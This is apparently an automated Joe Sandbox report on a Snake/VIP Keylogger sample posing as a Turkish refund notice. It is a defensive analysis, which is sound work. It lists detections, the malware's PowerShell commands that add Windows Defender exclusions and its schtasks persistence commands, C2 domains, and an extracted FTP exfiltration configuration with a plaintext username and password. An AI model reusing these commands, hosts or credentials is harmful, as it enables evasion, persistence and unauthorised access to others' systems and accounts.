Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
GeriOdemeBildirimi942.rar.xlxs.pdf.exe

Overview

General Information

Sample name:GeriOdemeBildirimi942.rar.xlxs.pdf.exe
Analysis ID:1524790
MD5:be92b638000820878c7be0e70e257c95
SHA1:af9706bed063d07c65eac06773c8e6a1ed2e447a
SHA256:407df9654a54792ee72730f5dae8bd303d7d92a24a5fe0a5bc83f634bab7a235
Tags:exegeoSnakeKeyloggerTURuser-abuse_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Sigma detected: Suspicious Double Extension File Execution
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Connects to many ports of the same IP (likely port scanning)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses FTP
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • GeriOdemeBildirimi942.rar.xlxs.pdf.exe (PID: 5648 cmdline: "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe" MD5: BE92B638000820878C7BE0E70E257C95)
    • powershell.exe (PID: 4048 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2024 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SOFcFE.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7360 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 6912 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SOFcFE" /XML "C:\Users\user\AppData\Local\Temp\tmpF6B6.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • SOFcFE.exe (PID: 7376 cmdline: C:\Users\user\AppData\Roaming\SOFcFE.exe MD5: BE92B638000820878C7BE0E70E257C95)
    • schtasks.exe (PID: 7620 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SOFcFE" /XML "C:\Users\user\AppData\Local\Temp\tmp1AF7.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • SOFcFE.exe (PID: 7664 cmdline: "C:\Users\user\AppData\Roaming\SOFcFE.exe" MD5: BE92B638000820878C7BE0E70E257C95)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "FTP", "Username": "awaratre_log@awaratrendz.com", "Password": "mxH!EyDs(.jx", "FTP Server": "ftp://awaratrendz.com/", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
0000000E.00000002.3763226390.0000000002E12000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
    0000000E.00000002.3763226390.0000000002C21000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      00000014.00000002.3763196888.0000000002F7F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        00000014.00000002.3760059045.000000000042F000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0xe40:$a1: get_encryptedPassword
        • 0x115d:$a2: get_encryptedUsername
        • 0xc50:$a3: get_timePasswordChanged
        • 0xd59:$a4: get_passwordField
        • 0xe56:$a5: set_encryptedPassword
        • 0x2502:$a7: get_logins
        • 0x2465:$a10: KeyLoggerEventArgs
        • 0x20ca:$a11: KeyLoggerEventArgsEventHandler
        0000000E.00000002.3760065848.0000000000436000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Click to see the 27 entries
          SourceRuleDescriptionAuthorStrings
          20.2.SOFcFE.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
            20.2.SOFcFE.exe.400000.0.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
              20.2.SOFcFE.exe.400000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
              • 0x2e040:$a1: get_encryptedPassword
              • 0x2e35d:$a2: get_encryptedUsername
              • 0x2de50:$a3: get_timePasswordChanged
              • 0x2df59:$a4: get_passwordField
              • 0x2e056:$a5: set_encryptedPassword
              • 0x2f702:$a7: get_logins
              • 0x2f665:$a10: KeyLoggerEventArgs
              • 0x2f2ca:$a11: KeyLoggerEventArgsEventHandler
              20.2.SOFcFE.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_DotNetProcHookDetects executables with potential process hoockingditekSHen
              • 0x2ec5a:$s1: UnHook
              • 0x2ec61:$s2: SetHook
              • 0x2ec69:$s3: CallNextHook
              • 0x2ec76:$s4: _hook
              1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 49 entries

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe", CommandLine: "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe, NewProcessName: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe, OriginalFileName: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe", ProcessId: 5648, ProcessName: GeriOdemeBildirimi942.rar.xlxs.pdf.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe", ParentImage: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe, ParentProcessId: 5648, ParentProcessName: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe", ProcessId: 4048, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe", ParentImage: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe, ParentProcessId: 5648, ParentProcessName: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe", ProcessId: 4048, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SOFcFE" /XML "C:\Users\user\AppData\Local\Temp\tmp1AF7.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SOFcFE" /XML "C:\Users\user\AppData\Local\Temp\tmp1AF7.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\SOFcFE.exe, ParentImage: C:\Users\user\AppData\Roaming\SOFcFE.exe, ParentProcessId: 7376, ParentProcessName: SOFcFE.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SOFcFE" /XML "C:\Users\user\AppData\Local\Temp\tmp1AF7.tmp", ProcessId: 7620, ProcessName: schtasks.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SOFcFE" /XML "C:\Users\user\AppData\Local\Temp\tmpF6B6.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SOFcFE" /XML "C:\Users\user\AppData\Local\Temp\tmpF6B6.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe", ParentImage: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe, ParentProcessId: 5648, ParentProcessName: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SOFcFE" /XML "C:\Users\user\AppData\Local\Temp\tmpF6B6.tmp", ProcessId: 6912, ProcessName: schtasks.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe", ParentImage: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe, ParentProcessId: 5648, ParentProcessName: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe", ProcessId: 4048, ProcessName: powershell.exe

                Persistence and Installation Behavior

                barindex
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SOFcFE" /XML "C:\Users\user\AppData\Local\Temp\tmpF6B6.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SOFcFE" /XML "C:\Users\user\AppData\Local\Temp\tmpF6B6.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe", ParentImage: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe, ParentProcessId: 5648, ParentProcessName: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SOFcFE" /XML "C:\Users\user\AppData\Local\Temp\tmpF6B6.tmp", ProcessId: 6912, ProcessName: schtasks.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-03T09:16:29.019175+020028033053Unknown Traffic192.168.2.749708188.114.96.3443TCP
                2024-10-03T09:16:34.012434+020028033053Unknown Traffic192.168.2.749716188.114.96.3443TCP
                2024-10-03T09:16:35.738427+020028033053Unknown Traffic192.168.2.749719188.114.96.3443TCP
                2024-10-03T09:16:41.179897+020028033053Unknown Traffic192.168.2.749728188.114.96.3443TCP
                2024-10-03T09:16:43.623130+020028033053Unknown Traffic192.168.2.749730188.114.96.3443TCP
                2024-10-03T09:16:45.677275+020028033053Unknown Traffic192.168.2.749732188.114.96.3443TCP
                2024-10-03T09:16:48.759459+020028033053Unknown Traffic192.168.2.749735188.114.96.3443TCP
                2024-10-03T09:16:54.749860+020028033053Unknown Traffic192.168.2.749743188.114.96.3443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-03T09:16:27.343805+020028032742Potentially Bad Traffic192.168.2.749705193.122.130.080TCP
                2024-10-03T09:16:28.390677+020028032742Potentially Bad Traffic192.168.2.749705193.122.130.080TCP
                2024-10-03T09:16:29.596072+020028032742Potentially Bad Traffic192.168.2.749709193.122.130.080TCP
                2024-10-03T09:16:31.125066+020028032742Potentially Bad Traffic192.168.2.749711193.122.130.080TCP
                2024-10-03T09:16:32.281413+020028032742Potentially Bad Traffic192.168.2.749713193.122.130.080TCP
                2024-10-03T09:16:33.218825+020028032742Potentially Bad Traffic192.168.2.749715193.122.130.080TCP
                2024-10-03T09:16:35.130195+020028032742Potentially Bad Traffic192.168.2.749717132.226.8.16980TCP
                2024-10-03T09:16:37.734532+020028032742Potentially Bad Traffic192.168.2.749722132.226.8.16980TCP
                2024-10-03T09:16:39.000117+020028032742Potentially Bad Traffic192.168.2.749721132.226.8.16980TCP
                2024-10-03T09:16:40.625110+020028032742Potentially Bad Traffic192.168.2.749726132.226.8.16980TCP
                2024-10-03T09:16:43.078198+020028032742Potentially Bad Traffic192.168.2.749721132.226.8.16980TCP
                2024-10-03T09:16:45.015722+020028032742Potentially Bad Traffic192.168.2.749731132.226.8.16980TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-03T09:16:15.593851+020028455321Malware Command and Control Activity Detected192.168.2.749748119.18.54.3921TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: http://aborters.duckdns.org:8081URL Reputation: Label: malware
                Source: http://anotherarmy.dns.army:8081URL Reputation: Label: malware
                Source: 16.2.SOFcFE.exe.4475780.2.raw.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "FTP", "Username": "awaratre_log@awaratrendz.com", "Password": "mxH!EyDs(.jx", "FTP Server": "ftp://awaratrendz.com/", "Version": "4.4"}
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeReversingLabs: Detection: 50%
                Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exeVirustotal: Detection: 27%Perma Link
                Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exeReversingLabs: Detection: 50%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeJoe Sandbox ML: detected
                Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exeJoe Sandbox ML: detected

                Location Tracking

                barindex
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49706 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49727 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49729 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49747 version: TLS 1.2
                Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: NRtD.pdbSHA256 source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, SOFcFE.exe.1.dr
                Source: Binary string: NRtD.pdb source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, SOFcFE.exe.1.dr
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 4x nop then jmp 0116F45Dh14_2_0116F2C0
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 4x nop then jmp 0116F45Dh14_2_0116F4AC
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 4x nop then jmp 0116FC19h14_2_0116F961
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 4x nop then jmp 058A9280h14_2_058A8FB0
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 4x nop then jmp 058AF13Eh14_2_058AEE70
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 4x nop then jmp 058A7EB5h14_2_058A7B78
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 4x nop then jmp 058A18A1h14_2_058A15F8
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 4x nop then jmp 058A0FF1h14_2_058A0D48
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 4x nop then jmp 058AE81Eh14_2_058AE550
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 4x nop then jmp 058AC82Eh14_2_058AC560
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 4x nop then jmp 058A6733h14_2_058A6488
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 4x nop then jmp 058A0741h14_2_058A0498
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 4x nop then jmp 058ADEFEh14_2_058ADC30
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 4x nop then jmp 058ABF0Eh14_2_058ABC40
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 4x nop then jmp 058A3709h14_2_058A3460
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 4x nop then jmp 058A5A29h14_2_058A5780
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 4x nop then jmp 058AFA5Eh14_2_058AF790
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 4x nop then jmp 058ADA6Eh14_2_058AD7A0
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 4x nop then jmp 058ABA7Eh14_2_058AB7B0
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 4x nop then jmp 058A79C9h14_2_058A7720
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 4x nop then jmp 058A2A01h14_2_058A2758
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 4x nop then jmp 058AD14Eh14_2_058ACE80
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 4x nop then jmp 058A2151h14_2_058A1EA8
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 4x nop then jmp 058A5179h14_2_058A4ED0
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 4x nop then jmp 058A48C9h14_2_058A4620
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 4x nop then jmp 058A7119h14_2_058A6E70
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 4x nop then jmp 058A1449h14_2_058A11A0
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 4x nop then jmp 058AECAEh14_2_058AE9E0
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 4x nop then jmp 058ACCBEh14_2_058AC9F0
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 4x nop then mov esp, ebp14_2_058AB089
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 4x nop then mov esp, ebp14_2_058AB098
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 4x nop then jmp 058AE38Eh14_2_058AE0C0
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 4x nop then jmp 058AC39Eh14_2_058AC0D0
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 4x nop then jmp 058A0B99h14_2_058A08F0
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 4x nop then jmp 058A32B1h14_2_058A3008
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 4x nop then jmp 058A62D9h14_2_058A6030
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 4x nop then jmp 058A02E9h14_2_058A0040
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 4x nop then jmp 058A2E59h14_2_058A2BB0
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 4x nop then jmp 058A5E81h14_2_058A5BD8
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 4x nop then jmp 058A25A9h14_2_058A2300
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 4x nop then jmp 058AF5CEh14_2_058AF300
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 4x nop then jmp 058AD5DEh14_2_058AD310
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 4x nop then jmp 058A55D1h14_2_058A5328
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 4x nop then jmp 058AB5EEh14_2_058AB320
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 4x nop then jmp 058A7571h14_2_058A72C8
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 4x nop then jmp 058A6CC1h14_2_058A6A18
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 4x nop then jmp 058A1CF9h14_2_058A1A50
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 4x nop then jmp 058A4D21h14_2_058A4A78
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 4x nop then jmp 02C3F2EDh20_2_02C3F3BF
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 4x nop then jmp 02C3F2EDh20_2_02C3F33C
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 4x nop then jmp 02C3F2EDh20_2_02C3F150
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 4x nop then jmp 02C3FAA9h20_2_02C3F7F1
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 4x nop then jmp 06A731E8h20_2_06A72DD0
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 4x nop then jmp 06A70D0Dh20_2_06A70B30
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 4x nop then jmp 06A71697h20_2_06A70B30
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 4x nop then jmp 06A72C21h20_2_06A72970
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 4x nop then jmp 06A7F8C9h20_2_06A7F620
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h20_2_06A70673
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 4x nop then jmp 06A7DA61h20_2_06A7D7B8
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 4x nop then jmp 06A7D1B1h20_2_06A7CF08
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 4x nop then jmp 06A7E769h20_2_06A7E4C0
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 4x nop then jmp 06A7DEB9h20_2_06A7DC10
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 4x nop then jmp 06A731E8h20_2_06A72DCA
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 4x nop then jmp 06A7F019h20_2_06A7ED70
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 4x nop then jmp 06A7FD21h20_2_06A7FA78
